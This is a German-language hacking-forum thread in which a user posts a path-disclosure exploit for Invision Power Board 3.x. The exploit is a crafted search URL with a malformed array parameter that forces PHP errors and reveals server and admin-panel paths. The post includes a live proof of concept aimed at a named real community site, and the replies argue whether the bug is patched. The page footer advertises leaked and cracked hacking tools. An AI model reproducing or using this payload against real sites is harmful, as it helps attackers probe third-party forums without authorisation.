Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

IPB Full Path Disclosure 3.x

- - - - -

  • Bitte melde dich an um zu Antworten
6 Antworten in diesem Thema

#1
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    67
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux
Yo Leute,

das ist eine Lücke die ich vor langem mal gefunden hab (die danach mindestens auf 100 andere arten kopiert wurde) die euch ganz einfach den pfad des adminpanels jeder Seite mit IPB zeigt, vorausgesetzt PHP error reporting ist aktiviert.

Einfach das an die URL ranhängen:

index.php?andor_type=and&app=core&do=search&module=search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_term=1&sid[$cranky]=1

Hier ein proof of concept:


http://community.simtropolis.com/index.php?andor_type=and&app=core&do=search&module=search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_term=1&sid[$cranky]=1

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 


#2
////

////

    Noob

  • Banned
  • PIPPIP
  • Likes
    0
  • 10 Beiträge
  • 2 Bedankt
Uralt und bei neuen Versionen schon lange fixed

#3
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    67
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux
Nicht fixed, tested auf 3.4.6.

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 


#4
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
logisch ist das bei der neuen Version gefixed. Das hatten die DEVILoper doch schon seit jahren aufm zettel ... forum lesen !

Lg

#5
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    67
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux

logisch ist das bei der neuen Version gefixed. Das hatten die DEVILoper doch schon seit jahren aufm zettel ... forum lesen !

Lg


logisch ist, es funktioniert immernoch, ich habs getestet.

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 


#6
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
poc bitte

#7
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    67
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux
Ich werd für ein POC kein forum aufsetzen und bei meinem werd ich das erst recht nicht machen.

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 1 user(s)


    komando2212
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.